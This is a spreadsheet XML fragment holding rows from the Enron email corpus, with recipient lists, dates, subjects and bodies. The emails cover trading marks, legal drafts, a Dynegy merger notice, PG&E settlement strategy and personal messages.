    <t>frozenset({'risk@enron.com', 'gordon.joseph@enron.com', 'jeff.king@enron.com', 'quotes@enron.com', 'john.suarez@enron.com', 'stotler.michael@enron.com', 'garrison.matt@enron.com', 'ferrari.scott@enron.com', 'corny@enron.com', 'cc@enron.com', 'tomson.l@enron.com', 'nmistry@enron.com', 'forester.dh@enron.com', 'zrothman@enron.com', 'stda@enron.com', 'b.stephanie@enron.com', 'rpad@enron.com', 'myers.je@enron.com', 'kelly.dr@enron.com', 'lohfeld.kristin@enron.com', 'jester.larry@enron.com', 'prisco.pamela@enron.com', 'lmcphail@enron.com', "o'neal.sean@enron.com", 'king.byron@enron.com', 'mmoore@enron.com', 'heinecke.justin@enron.com', 'schwertner.brandon@enron.com', 'bgannaway@enron.com', 'jbrown@enron.com', 'tamplen.brian@enron.com', 'stenberg.steve@enron.com', 'mike.carson@enron.com', 'stanton.scott@enron.com', 'mboyle@enron.com', 'weinstein.scott@enron.com', 'yamamura.alan@enron.com', 'zammit.christophe@enron.com', 'krothe.joe@enron.com', 'wallat.christine@enron.com', 'jkech@enron.com'})</t>
  </si>
  <si>
    <t>Amerex Power Closing Marks for 1-9-2002</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 - 1-9-2002.xls </t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 11:40:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>HBS June 14 - REMINDER</t>
  </si>
  <si>
    <t>The Harvard Business School Club will hold its final meeting next Thursday,_x000D_
June 14 at Brennan's Restaurant beginning at 6:00 PM.  Featured speaker is_x000D_
Howard Stevenson, HBS Professor renowned for Entrepreneurial Management_x000D_
issues.  Departing Directors and Officers will be recognized for their_x000D_
efforts and your show of support would be greatly appreciated.  Spouses and_x000D_
guests are encouraged to attend.  The food will be awesome and the_x000D_
fellowship unbeatable.  Please notify Dottie Kerr of your intentions to_x000D_
attend by Tuesday, June 12, noon._x000D_
_x000D_
Thank you,_x000D_
_x000D_
George Laflin_x000D_
President_x000D_
_x000D_
======================_x000D_
RESERVATIONS REQUIRED.  Reservations accepted until NOON on June 12,_x000D_
2001.  Fax following information to 281/424-4770, e-mail_x000D_
dottie@kerr-solutions.com, or call 281/424-3084._x000D_
_x000D_
Member Name:_x000D_
Company:_x000D_
Phone:_x000D_
Guest Name:_x000D_
Sustaining Members: $35_x000D_
Regular Members and Guests: $45_x000D_
Payment:  Credit Card (Visa, MC, Amex)_x000D_
Card Number:_x000D_
Exp Date:_x000D_
_x000D_
_x000D_
***************_x000D_
Dottie Kerr (dottie@kerr-solutions.com)_x000D_
Administrator for Harvard Business School Club of Houston_x000D_
http://www.hbshouston.org/</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 05:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Bridenstine</t>
  </si>
  <si>
    <t xml:space="preserve">pls print.  thanks df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 08/09/2000 _x000D_
12:03 PM ---------------------------_x000D_
From: Britt Davis on 08/09/2000 11:57 AM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON, Jim Talcott/ET&amp;S/Enron@ENRON, Bob _x000D_
Thurber/ET&amp;S/Enron@ENRON, Deborah Shahmoradi/NA/Enron@Enron, Brenda _x000D_
McAfee/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Bridenstine_x000D_
_x000D_
Attached for your review is Jim Peters' rough draft. Jim tried to design it _x000D_
in such a way as to be as generic as possible, with the idea that factual _x000D_
differences between the parties would be put in the footnotes.  I am _x000D_
concerned he may be overreaching with regard to the legal objection, where he _x000D_
refers to TW/Northern as a "nonresident", given that (as I understand it) _x000D_
Northern and/or TW have facilities in Oklahoma.  There are also some _x000D_
grammatical changes that I would make._x000D_
_x000D_
I wonder if I could get ya'll to take a look at this and have you participate _x000D_
with me in a telephone conference with Jim later this afternoon?  If Drew, _x000D_
Jim or Bob could let me know what time would be convenient, I'll get it set _x000D_
up.  Many thanks._x000D_
_x000D_
       B.K.D._x000D_
----- Forwarded by Britt Davis/Corp/Enron on 08/09/2000 11:22 AM -----_x000D_
_x000D_
	MHBullis@aol.com_x000D_
	08/09/2000 09:59 AM_x000D_
		 _x000D_
		 To: Britt.Davis@enron.com, lpain@duke-energy.com, meremmenga@cmsenergy.com_x000D_
		 cc: _x000D_
		 Subject: Re: Bridenstine_x000D_
_x000D_
_x000D_
Attached to this email is a proposed draft of a Special Appearance and_x000D_
Objection for your review and approval.  Please note Footnote 1 needs your_x000D_
input._x000D_
_x000D_
Hopefully, we can send the pleading out today but in no event later than_x000D_
tomorrow._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jim Peters_x000D_
_x000D_
 - SPECIA~1.WPD_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 06:44:00 -0800 (PS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mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'cyril.price@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'joe.quenet@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'george.hopley@enron.com', 'joe.errigo@enron.com', 'stephanie.piwetz@enron.com', 'joseph.wagner@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@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eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'james.terrell@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kevin.presto@enron.com', 'leslie.hansen@enron.com', 'mitzie.scott@enron.com', 'kim.ward@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'john.suarez@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'jeffrey.hodge@enron.com', 'stacey.white@enron.com', 'andy.pace@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'christopher.watts@enron.com', 'rod.nelson@enron.com', 'kevin.cline@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'ted.ballinger@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'jenny.latham@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'jay.wills@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'brent.hebert@enron.com', 'monica.lande@enron.com', 'christopher.smith@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'george.wood@enron.com', 'grace.kim@enron.com', 'dave.mangskau@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@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juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>Public Utility District No. 1 of Snohomish County</t>
  </si>
  <si>
    <t>We have received the executed EEI Master Power Purchase and Sale Agreement _x000D_
dated 1/26/01 from the referenced CP.  Copies will be distributed to Legal _x000D_
and Credit.</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 08:04:34 -0800 (PST)</t>
  </si>
  <si>
    <t>Dynegy Discussions</t>
  </si>
  <si>
    <t>_x000D_
Enron and Dynegy each announced today that they are holding discussions about a possible merger of the two companies.  As you know, Dynegy is a major player in the energy marketplace, and is not only a competitor, but also a counterparty of Enron.  This is just one of several options that we are considering._x000D_
_x000D_
Upon receipt of this announcement, the NYSE briefly suspended trading of both Enron and Dynegy.  We have no additional information we can share at this time.  We'll keep you updated as developments occur.</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 05:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PR Department</t>
  </si>
  <si>
    <t xml:space="preserve">Vince, I received this inquiry about you.  I am forwarding it to you so you _x000D_
can respond to it or politely tell them your not interested._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Cindy Derecskey/Corp/Enron on 07/18/2000 _x000D_
12:03 PM ---------------------------_x000D_
_x000D_
_x000D_
"alex.bandini" &lt;alex.bandini@petroleum-economics.com&gt; on 07/18/2000 11:10:23 _x000D_
AM_x000D_
Please respond to &lt;alex.bandini@petroleum-economics.com&gt;_x000D_
To: &lt;public-relations@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
_x000D_
Dear Sir/Madam,_x000D_
_x000D_
I am writing on behalf of Petroleum Economics Ltd, an energy consultancy_x000D_
firm based in London. We are currently updating our lists of contact_x000D_
addresses, and I would be most grateful if you could pass on contact details_x000D_
for Mr Vince Kaminski, your Head of Quantitative Research._x000D_
_x000D_
Yours Faithfully_x000D_
_x000D_
Alex Bandini_x000D_
_x000D_
__________________________________________x000D_
_x000D_
Alex Bandini_x000D_
_x000D_
Petroleum Economics Limited_x000D_
Tel: +44 (0)20-7553-2000_x000D_
Fax: +44 (0)20-7553-2001_x000D_
E-mail: alex.bandini@petroleum-economics.com_x000D_
http://www.petroleum-economics.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 04:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Scott Goodell@ENRON_x000D_
02/17/2000 12:45 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
The best contacts at Sonat are..._x000D_
_x000D_
Jerry Nelson 205-325-7257_x000D_
Lisa Guthrie 205-325-3816_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Jul 1999 01:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'douglas.friedman@enron.com'})</t>
  </si>
  <si>
    <t>Re: OPP confidentiality agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Left you a voice mail. Check with Stacy or Jeff.  Is Janice back?_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Douglas S Friedman                           07/06/99 04:50 PM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT, Janice Moore/HOU/ECT@ECT_x000D_
cc: John L Nowlan/HOU/ECT@ECT, Alan Engberg, Pat McSpadden/HOU/ECT@ECT _x000D_
Subject: OPP confidentiality agreement_x000D_
_x000D_
Sara, Janice:_x000D_
_x000D_
I'm not sure which, if either, of you will work with us on this.  We are _x000D_
under a somewhat rigid timeline though.  OPP is flying up from Brazil on Mon _x000D_
July 12 to hopefully finalize overall agreement in principle on the _x000D_
"Contingent Buyer" transaction terms.  We'd like to finalize our response to _x000D_
a confidentiality agrement by Wed 7/7 and send back to OPP for signature.  _x000D_
From what we see in the document looks like we need to:_x000D_
_x000D_
work on the wording of the preamble_x000D_
make "two-way" protecting our terms and conditions etc._x000D_
add agreement term_x000D_
add "confidentiality" term_x000D_
define "products"_x000D_
require their signature_x000D_
_x000D_
Comments???_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Doug_x000D_
_x000D_
P.S.  This transaction has about $5 million in value to Enron.  Thanks for _x000D_
your urgent attention._x000D_
---------------------- Forwarded by Douglas S Friedman/HOU/ECT on 07/06/99 _x000D_
04:39 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "De Smedt, Jasja  (IBK-NY)" &lt;JDeSmedt@exchange.ML.com&gt;                 _x000D_
          07/06/99 04:00 PM_x000D_
	_x000D_
_x000D_
To: Douglas S Friedman/HOU/ECT_x000D_
cc: "Guterres, Pedro  (IBK-NY)" &lt;PGuterres@exchange.ML.com&gt;, "Lucente, _x000D_
Michael (CICG-CAPMKTS)" &lt;MLucente@exchange.ML.com&gt; _x000D_
Subject: OPP confidentiality agreement_x000D_
_x000D_
_x000D_
_x000D_
Douglas,_x000D_
Attached please find the confidentiality agreement that will cover_x000D_
information received by Enron from OPP in connection with the proposed_x000D_
transaction. Please review and then send to OPP. Please fax me a copy of the_x000D_
signed confidentiality agreement as well so that I can send you all the_x000D_
information that you requested regarding OPP._x000D_
 &lt;&lt;enron confidentiality agreement.doc&gt;&gt;_x000D_
_x000D_
Regards,_x000D_
_x000D_
Jasja De Smedt_x000D_
_x000D_
 - enron confidentiality agreement.doc_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'mark_irwin@beavton.k12.or.us', 'jons@gfsloans.com', 'chris@bram.net', 'brent_tanner@mindspring.com', 'mccarthp_1@yahoo.com', 'mark.guzman@enron.com', 'chris@majesticmortgage.com', 'seanr@teamtli.com', 'billc@rosequarter.com', 'reubenschug@yahoo.com', 'sharkb8@teleport.com', 'brendanf@gfsloans.com', 'seanpatrick@iname.com', 'guzman27@email.msn.com', 'creightonca@hotmail.com', 'penn_eric@salkeiz.k12.or.us'})</t>
  </si>
  <si>
    <t>Softball stuff</t>
  </si>
  <si>
    <t>Good morning_x000D_
Ok, a few items today.  Sorry to those that showed up Saturday for practice _x000D_
and I wasnt there.  At 12:30 it was absolutely dumping rain at my house and I _x000D_
just assumed that the field was unplayable and that no one else would want to _x000D_
be out there anyways.  So to those brave souls that showed up, I give you my _x000D_
appreciation for your effort and again I apologize for either not calling or _x000D_
showing up myself.  Along those lines, tomorrows game has a chance of being _x000D_
rained out.  The rainout hotline number to call is 503-823-2233, it is _x000D_
updated after 3 PM.  Lastly, I have also made some aerial maps of the parks _x000D_
that we play at this spring.  I guess you could say that I have too much time _x000D_
on my hands, but I have access to some cool programs here at work.  So _x000D_
hopefully these will help you guys find the parks.  See you guys tomorrow, _x000D_
weather permitting.  Questions, comments, let me know._x000D_
Chris_x000D_
_x000D_
 - farragutmap.jpg_x000D_
 - deltamap.jpg</t>
  </si>
  <si>
    <t>Tue, 28 May 2002 06:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: downtime allocation document and parameter list</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Jeff Duff/EWC/Enron on 05/28/2002 01:14 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kim Nguyen_x000D_
05/23/2002 12:20 PM_x000D_
To: Jeff Duff/EWC/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: downtime allocation document and parameter list_x000D_
_x000D_
attached is the file you've requested. My testing documentation is exactly _x000D_
the same, except in different format._x000D_
_x000D_
hope this help!_x000D_
_x000D_
Kim_x000D_
_x000D_
---------------------- Forwarded by Kim Nguyen/EWC/Enron on 05/23/2002 12:32 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Garth Ripton_x000D_
04/16/2002 12:33 AM_x000D_
To: Erik Ellis/EWC/Enron@Enron_x000D_
cc: Kim Nguyen/EWC/Enron@Enron _x000D_
_x000D_
Subject: Re: downtime allocation document and parameter list  _x000D_
_x000D_
Hi Erik,_x000D_
_x000D_
I worked on this for a little while last night but I couldn't get a modem _x000D_
connection from the Hotel. I hope the timing is OK. The confirmed counters _x000D_
are highlighted in green. The counters that need to be corrected are _x000D_
highlighted in red. Most of the corrections are due to the fact that the _x000D_
fault/status messages that are the result of enabling a "manual" operation _x000D_
mode (for example, manual yaw) increment the maintenance counter not the _x000D_
"turbine OK" counter. Unfortunately, there are many faults that we could not _x000D_
confirm using the turbine simulator. If you have any questions Kim Nguyen is _x000D_
the person who did the actual testing. I forwarded the results to Mark _x000D_
Fischer and Mark Walker so they could check to see if this is the way we want _x000D_
the counters incremented for the given fault conditions but have yet to get _x000D_
any feedback. The faults that we could not test should be confirmed by _x000D_
looking at the Bachmann software. Hopefully this will occur in the near _x000D_
future. For now, this is the best information we have._x000D_
_x000D_
_x000D_
_x000D_
-Garth_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 07:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>revised Lehman forward</t>
  </si>
  <si>
    <t xml:space="preserve">Mary:  you may want to see the registration comments offered by Jim Armogida _x000D_
in the attached doc.  SS_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Dec 2001 15:41:26 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Countdown</t>
  </si>
  <si>
    <t>Both Kim's parents &amp; my mom will be at the house on Christmas eve/Christmas day -- so I think they'll eat their Christmas meal at our house.  I'm sure that Kim, Chad, Mom and Nevin would appreciate a Christmas evening dessert invite.  You can coordinate when you see them for Mexican food on Sat. night._x000D_
_x000D_
Have fun at the violin concert._x000D_
_x000D_
-----Original Message-----_x000D_
From: Jewell, Cyndi M [mailto:cjewell@bcm.tmc.edu]_x000D_
Sent: Tuesday, December 11, 2001 3:51 PM_x000D_
To: Shelley A. Corman (E-mail)_x000D_
Subject: Countdown_x000D_
_x000D_
_x000D_
Hi. Just checking into see how you are doing. As you know, other than_x000D_
putting up lights and wrapping gifts, I am here to assist (shopping, baking,_x000D_
card playing, Lego building, dog or cat sitting, Mother entertainment). Do_x000D_
you think your clan would like to come over for Christmas dinner or at least_x000D_
in the evening for some dessert? ( I realize you are probably not focused on_x000D_
food now, but...)_x000D_
I ordered the phrase book and John, Brianna, and I will start studying._x000D_
Tonight, we are going to Miss B's Christmas violin concert!_x000D_
_x000D_
Take care,_x000D_
CJB</t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 10:23:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tjlynch@nyseg.com'})</t>
  </si>
  <si>
    <t>Re: Follow Up Material from 9/19 Pricing Issues Task Force meeting</t>
  </si>
  <si>
    <t>_x000D_
tjlynch@nyseg.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
_x000D_
The BME-SCD Operating Reserve Comparison includes the following note:_x000D_
"Data for BME hours beginning 0:00 was not reliable, assumed all hours were_x000D_
not short."_x000D_
_x000D_
Please explain why data for this hour each day is unreliable and how it_x000D_
impacts customer bills.  We are troubled that after operating a system for_x000D_
nearly two years, problems remain that cause this magnitude of inaccuracy._x000D_
_x000D_
Tim Lynch_x000D_
NYSEG Energy Trading_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Pricing Issues Task Force Members,_x000D_
_x000D_
The attached documents contain the additional price analysis that Andrew_x000D_
Hartshorn agreed to provide at the September 19, 2001 Pricing Issues Task_x000D_
force Meeting._x000D_
_x000D_
Regards,_x000D_
Monica Ryan-Taber_x000D_
518-356-6222_x000D_
_x000D_
(See attached file: BME_SCD_Load_Compare_Values.pdf)(See attached file:_x000D_
BME_SCD_Op_Res_Compare_Values.pdf)</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 02:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Financial Analysis of PG&amp;E and Proposed Terms for Settlement</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mary Hain/HOU/ECT on 01/12/2001 10:22 A=_x000D_
M=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Mary Hain_x000D_
01/12/2001 10:11 AM_x000D_
To: Tim Belden/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Re: Financial Analysis of PG&amp;E and Proposed Terms for Settlement_x000D_
_x000D_
Is EES asking for too much here (especially extending the rate freeze)? =20_x000D_
Wouldn't it be better to get this thing resolved (assuming that's possible)=_x000D_
?_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 01/12/2001 10:14 A=_x000D_
M=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Scott Stoness@EES_x000D_
01/12/2001 07:12 AM_x000D_
To: James D Steffes/NA/Enron@ENRON_x000D_
cc: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Mark=20_x000D_
Palmer/Corp/Enron@ENRON, Michael Tribolet/Corp/Enron@Enron, Harry=20_x000D_
Kingerski/NA/Enron@Enron, Jeff Dasovich/NA/Enron@Enron, Susan J=20_x000D_
Mara/NA/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Sarah=20_x000D_
Novosel/Corp/Enron@ENRON, Linda Robertson/NA/Enron@ENRON, Alan=20_x000D_
Comnes/PDX/ECT@ECT@ENRON, Mary Hain/HOU/ECT@ECT@ENRON, Paul=20_x000D_
Kaufman/PDX/ECT@ECT@ENRON, Sandra McCubbin/NA/Enron@Enron, Roger=20_x000D_
Yang/SFO/EES@EES, Robert Badeer/HOU/ECT@ECT@ENRON, Tim=20_x000D_
Belden/HOU/ECT@ECT@ENRON, Stephen Swain/PDX/ECT@ECT@ENRON, Travis=20_x000D_
McCullough/HOU/ECT@ECT@ENRON, Andre=20_x000D_
Cangucu/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON, Shelia=20_x000D_
Benke/Corp/Enron@Enron, Vicki Sharp/HOU/EES@EES, Wanda Curry/HOU/EES@EES, D=_x000D_
on=20_x000D_
Black/HOU/EES@EES, Gordon Savage/HOU/EES@EES, Donna Fulton/Corp/Enron@ENRON=_x000D_
,=20_x000D_
William S Bradford/HOU/ECT@ECT@ENRON=20_x000D_
Subject: Re: Financial Analysis of PG&amp;E and Proposed Terms for Settlement =_x000D_
=20_x000D_
_x000D_
Jim.  I like your suggestions and suggest the following enhancements:_x000D_
We should integrate this solution into the CPUC process. ie Keep rate freez=_x000D_
e=20_x000D_
in effect until the Mar 02.  Make state agency take over as ESP to all=20_x000D_
bundled customers at 110% of frozen rate.  This solution keeps the current=_x000D_
=20_x000D_
Rate Freeze in place and keeps us in the game to not lose our negative ctc.=_x000D_
 =20_x000D_
It also corresponds to your minimal changes goal.  It also puts government=_x000D_
=20_x000D_
agency in the same place as us in having exposure to negative ctc as us.  I=_x000D_
t=20_x000D_
also accomodates the problem of RFP's taking longer than expected.  It also=_x000D_
=20_x000D_
solves the liquidity problem immediately and avoids the need for=20_x000D_
forbearance.  And furthermore it keeps the utility exposed to bankruptcy=20_x000D_
which minimizes their negotiating power._x000D_
I don't understand how this proposal addreses what happens with the existin=_x000D_
g=20_x000D_
assets of PG&amp;E.  The worry I have is that PG&amp;E gets to keep 50% of the=20_x000D_
benefits of nuclear sales and 10% of the benefits of hydro sales, post rate=_x000D_
=20_x000D_
freeze.  If we damage 1890, the utilities are now in the drivers seat._x000D_
re "ESPs should be able to buy from UDCs at the current weighted average=20_x000D_
generation rate from 1/1/01 =01) 12/31/02 to serve any competitive load in=_x000D_
=20_x000D_
California"  This suggest a replacement to AB 1890 which suggests significa=_x000D_
nt=20_x000D_
changes.  Would it not be better to say "After the rate freeze, the=20_x000D_
government entity would take over the obligations of PG&amp;E and continue them=_x000D_
=20_x000D_
to the end of 2002.  Such assumption and continuation, would be combined wi=_x000D_
th=20_x000D_
the government entity recieving the benefits of  the difference between=20_x000D_
market prices and embedded costs of the SCE/PG&amp;E existing generation assets=_x000D_
._x000D_
_x000D_
Summary of Solution that incorporates these suggestions_x000D_
Government entity becomes an ESP taking over all customers not served by=20_x000D_
another ESP._x000D_
Government accepts any ESP's that come back within 3 weeks._x000D_
Utilities stopped from selling any additional nuclear, hydro, thermal or QF=_x000D_
=20_x000D_
generation. (requires change in legislation)_x000D_
Utilities provide surcharge/credit, for the lessor of 40 years or retiremen=_x000D_
t,=20_x000D_
based on the difference between generation COS and market value to all ESPs=_x000D_
,=20_x000D_
after rate freeze ends (requires change in legislation and settlement)._x000D_
Government entity, as ESP,  charges Frozen Rate plus 10% until the end of=_x000D_
=20_x000D_
2002._x000D_
Government entity, assures all ESP that they will their costs will not exce=_x000D_
ed=20_x000D_
110% of frozen rate until the end of 2002._x000D_
Rate freeze and surcharge continue until the end of March 2002._x000D_
Any shortfall of agency would be recovered through a amortization over the=_x000D_
=20_x000D_
next 15 years with securitization less positive proceeds from auctioning=20_x000D_
default provider. (requires change in legislation)_x000D_
Government commit to building 10,000 MW of generation by summer of 2002_x000D_
Government commit to allowing emmission constrainted generators to buy=20_x000D_
emission credits_x000D_
Goverment change legislation to allow swift DSM activity_x000D_
_x000D_
_x000D_
_x000D_
From: James D Steffes@ENRON on 01/11/2001 10:42 PM_x000D_
To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Mark=20_x000D_
Palmer/Corp/Enron@ENRON, Michael Tribolet/Corp/Enron@Enron, Harry=20_x000D_
Kingerski/NA/Enron@Enron, Jeff Dasovich/NA/Enron@Enron, Susan J=20_x000D_
Mara/NA/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Sarah=20_x000D_
Novosel/Corp/Enron@ENRON, Linda Robertson/NA/Enron@ENRON, Alan=20_x000D_
Comnes/PDX/ECT@ECT, Mary Hain/HOU/ECT@ECT, Paul Kaufman/PDX/ECT@ECT, Sandra=_x000D_
=20_x000D_
McCubbin/NA/Enron@Enron, Roger Yang/SFO/EES@EES, Scott Stoness/HOU/EES@EES,=_x000D_
=20_x000D_
Robert Badeer/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT, Stephen Swain/PDX/ECT@EC=_x000D_
T,=20_x000D_
Travis McCullough/HOU/ECT@ECT, Andre=20_x000D_
Cangucu/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Shelia Benke/Corp/Enron@Enron,=_x000D_
=20_x000D_
Vicki Sharp/HOU/EES@EES, Wanda Curry/HOU/EES@EES, Don Black/HOU/EES@EES,=20_x000D_
Gordon Savage/HOU/EES@EES, Donna Fulton/Corp/Enron@ENRON, William S=20_x000D_
Bradford/HOU/ECT@ECT_x000D_
cc: =20_x000D_
Subject: Financial Analysis of PG&amp;E and Proposed Terms for Settlement_x000D_
_x000D_
Attached please find three documents that outlines the economics of LT=20_x000D_
contracting necessary for PG&amp;E and SCE.  Also find some thoughts on element=_x000D_
s=20_x000D_
of a workable settlement._x000D_
_x000D_
Call me with any questions._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Scott Stoness_x000D_
01/11/2001 05:09 PM_x000D_
To: James D Steffes/NA/Enron@ENRON_x000D_
cc: Don Black/HOU/EES@EES, Harry Kingerski/NA/Enron@Enron=20_x000D_
Subject: Re: Treasury (keep PG&amp;E) Solvent Strategy =20_x000D_
_x000D_
Great idea.  My strategy was solve the immediate problem of solvency quickl=_x000D_
y=20_x000D_
by getting the government to step in while the rules of the RFP are defined=_x000D_
,=20_x000D_
then do the auction, but if you think we could go straight to an RFP for=20_x000D_
standard offer without going bankrupt, I would be for it._x000D_
_x000D_
I believe that we do not have time for an RFP (6 months) so that we should=_x000D_
=20_x000D_
get the government entity to step in to give us the time._x000D_
_x000D_
And auction by rate class would be good but noone would want the large=20_x000D_
classes because their rate increase will be higher and they will be less=20_x000D_
likely to stay._x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
From: James D Steffes@ENRON on 01/11/2001 03:25 PM_x000D_
To: Scott Stoness/HOU/EES@EES_x000D_
cc: Don Black/HOU/EES@EES, Harry Kingerski/NA/Enron@Enron=20_x000D_
Subject: Re: Treasury (keep PG&amp;E) Solvent Strategy =20_x000D_
_x000D_
What about something different?_x000D_
_x000D_
If we asked for an Auction by rate class that would allow a different compa=_x000D_
ny=20_x000D_
to market the default service.  The competitive bids would be used to reduc=_x000D_
e=20_x000D_
the overall undercollection.  So in your ST point #1, replace Government=20_x000D_
entity with a Competitive ESP that has paid the most to win that right._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=09Scott Stoness@EES_x000D_
=0901/11/2001 02:39 PM_x000D_
=09=09=20_x000D_
=09=09 To: James D Steffes/NA/Enron@Enron_x000D_
=09=09 cc: Harry Kingerski/NA/Enron@Enron, Don Black_x000D_
=09=09 Subject: Treasury (keep PG&amp;E) Solvent Strategy_x000D_
_x000D_
Solution_x000D_
Government entity becomes an ESP taking over all customers not served by=20_x000D_
another ESP._x000D_
Government accepts any ESP's that come back within 3 weeks_x000D_
Utilities stopped from selling any additional nuclear, hydro, thermal or QF=_x000D_
=20_x000D_
generation._x000D_
Utilities provide surcharge/credit, for the lessor of 40 years or retiremen=_x000D_
t,=20_x000D_
based on the difference between generation COS and market value to all ESPs=_x000D_
,=20_x000D_
after rate freeze ends._x000D_
Government entity, as ESP,  charges Frozen Rate plus 10% until the end of=_x000D_
=20_x000D_
2002._x000D_
Government entity, assures all ESP that they will their costs will not exce=_x000D_
ed=20_x000D_
110% of frozen rate until the end of 2002._x000D_
Rate freeze and surcharge continue until the end of March 2002._x000D_
Any shortfall of agency would be recovered through a amortization over the=_x000D_
=20_x000D_
next 15 years with securitization less positive proceeds from auctioning=20_x000D_
default provider._x000D_
_x000D_
Other:_x000D_
Government commit to building 10,000 MW of generation by summer of 2002_x000D_
